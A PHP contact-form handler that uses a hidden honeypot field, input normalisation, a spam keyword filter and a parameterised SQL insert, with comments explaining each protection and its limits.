<?php 
include("include/connection.php");

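// Contact-form handler: runs only when the form's submit field `query` is posted.
// Flow: honeypot check -> input normalisation -> spam keyword filter -> parameterised INSERT.
// `$con` is the mysqli connection provided by include/connection.php.
if (isset($_POST['query'])) {

    // --- 1. BOT PROTECTION (honeypot) ---
    // The HTML form must contain this hidden field:
    //   <input type="text" name="website_url" style="display:none;">
    // Human visitors never fill it in, so any value indicates an automated submission.
    if (!empty($_POST['website_url'])) {
        die("Bot activity detected!");
    }

    // --- 2. INPUT NORMALISATION ---
    // Each field must be a plain string. A request can send `name[]=x`, which makes
    // $_POST['name'] an array and would raise a TypeError inside trim(); a missing
    // field would pass null to trim(). Missing fields become '' and non-string
    // values are rejected with the generic error.
    $fields = [];
    foreach (['name', 'email', 'subject', 'contact', 'message'] as $key) {
        $raw = $_POST[$key] ?? '';
        if (!is_string($raw)) {
            echo "<script>alert('Something went wrong. Please try again later.')</script>";
            exit();
        }
        // strip_tags() only removes markup before storage. It is not output encoding:
        // whatever page later displays these rows must still escape them
        // (e.g. htmlspecialchars) for the context they are printed in.
        $fields[$key] = strip_tags(trim($raw));
    }

    $name    = $fields['name'];
    $email   = $fields['email'];
    $subject = $fields['subject'];
    $contact = $fields['contact'];
    $message = $fields['message'];

    // --- 3. SPAM KEYWORD FILTER ---
    // Rejects links, markup fragments and a few promotional keywords ("купить" is
    // Russian for "buy"). This is a spam heuristic, not a security control: the
    // substrings are matched anywhere, so legitimate text containing "http", "src"
    // or ".in" is rejected too, and only `message` and `name` are checked.
    $spam_pattern = "/(http|https|www|\.com|\.net|\.org|\.in|href|src|<script|buy online|shop online|купить|internet-store)/i";

    if (preg_match($spam_pattern, $message) || preg_match($spam_pattern, $name)) {
        echo "<script>alert('Security Alert: Promotional content or links are not allowed!');</script>";
        echo "<script>window.open('index.php','_self')</script>";
        exit();
    }

    // --- 4. SQL INJECTION PROTECTION (prepared statement) ---
    // User data is bound as parameters and never concatenated into the SQL text.
    $stmt = mysqli_prepare($con, "INSERT INTO `query` (`name`, `email`, `subject`, `number`, `message`) VALUES (?, ?, ?, ?, ?)");

    if ($stmt) {
        mysqli_stmt_bind_param($stmt, "sssss", $name, $email, $subject, $contact, $message);

        if (mysqli_stmt_execute($stmt)) {
            echo "<script>alert('Thank You, I will contact you shortly')</script>";
            echo "<script>window.open('index.php','_self')</script>";
        } else {
            // Keep database details out of the response; record them server-side only.
            error_log('Contact form insert failed: ' . mysqli_stmt_error($stmt));
            echo "<script>alert('Something went wrong. Please try again later.')</script>";
        }

        mysqli_stmt_close($stmt);
    } else {
        // A failed prepare previously produced an empty response; report it the same
        // generic way as a failed execute and log the cause server-side.
        error_log('Contact form prepare failed: ' . mysqli_error($con));
        echo "<script>alert('Something went wrong. Please try again later.')</script>";
    }
}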



?>
